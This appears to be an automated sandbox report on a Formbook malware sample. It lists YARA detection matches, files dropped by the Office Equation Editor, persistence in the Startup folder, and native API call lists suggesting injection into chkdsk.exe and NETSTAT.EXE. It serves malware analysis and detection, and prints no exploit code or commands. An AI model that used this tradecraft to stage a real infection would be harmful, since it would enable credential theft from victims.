          Source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Screenshot number: 4Screenshot OCR: protected documents the yellow bar above 25 26 27 28 29 30 31 32 33 34 35 0 0 36 37
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXEMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXEMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0019D018 NtQueryInformationProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0019D0D9 NtQueryInformationProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0019D010 NtQueryInformationProcess,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A050 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A100 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00419F20 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00419FD0 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A04E NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A0FA NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00419F72 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00419FCB NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008400C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00840048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00840078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00840060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008401D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0084010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008407AC NtCreateMutant,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00840C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008410D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00841148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00841930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00841D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083FD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083FE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083FFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0083FF34 NtQueueApcThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_0039D018 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_0039D0D9 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_0039D010 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0041A050 NtClose,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0041A100 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00419F20 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00419FD0 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0041A04E NtClose,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_0041A0FA NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00419F72 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00419FCB NtReadFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008C00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008C0048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008C0078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BFC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BFEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008C0060 NtQuerySection,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008C01D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008C010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008C07AC NtCreateMutant,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008C0C40 NtGetContextThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008C10D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008C1148 NtOpenThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BF8CC NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BF938 NtWriteFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008C1930 NtSetContextThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BFAB8 NtQueryValueKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BFA20 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BFA50 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BFBE8 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BFB50 NtCreateKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BFC30 NtOpenProcess,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BFC48 NtSetInformationFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008C1D80 NtSuspendThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BFD5C NtEnumerateKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BFE24 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BFFFC NtCreateProcessEx,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008BFF34 NtQueueApcThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_00289882 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_02540078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_025400C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_025407AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253FA50 NtEnumerateValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253F938 NtWriteFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253FC48 NtSetInformationFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_02540048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_02540060 NtQuerySection,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_025410D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_02541148 NtOpenThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0254010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_025401D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_02541930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_02540C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0253FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_02541D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0009A050 NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0009A100 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_00099F20 NtCreateFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_00099FD0 NtReadFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0009A04E NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_0009A0FA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_00099F72 NtCreateFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_00099FCB NtReadFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_00EA93EE NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_00EA9882 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_00EA93F2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00192858
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001998F0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0019D138
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00191540
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0019A6D8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00192868
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00196960
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00195300
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00198BC8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00192D60
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00196E10
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00196E00
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0019C678
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0019DF90
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F6468
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F1888
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F3CE8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F2158
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F1540
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D72050
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041D997
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041D20B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D87
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409E30
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041D6BE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0084E0C6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0084E2E9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F63BF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008763DB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00852305
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0089A37B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D443E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D05E3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0086C5F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00896540
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00854680
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0085E6C1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F2622
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0089A634
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0085C7BC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0085C85C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0087286D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F098E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008529B2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008669FE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E49F5
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0089C920
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008FCBA4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D6BCB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F2C9C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DAC5E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00880D3B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0085CD5B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00882E2F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0086EE4C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008ECFB1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008C2FDC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00860F3F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0087D005
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00853040
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0086905A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CD06D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DD13F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F1238
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0084F3CF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00857353
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00885485
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00861489
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0088D47D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F35DA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0085351F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D579A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008857C3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E771D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CF8C4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008EF8EE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D394B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D5955
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00903A83
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0084FBD7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DDBDA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00877B00
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008EFDDD
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DBF14
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0087DF7C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00D72050
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_00392858
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_003998F0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_0039D514
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_00392D60
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_00391540
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_0039A6D8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_00392868
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_0039D138
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_00396960
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_00395300
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_00398BC8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_00396E10
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 7_2_00396E00
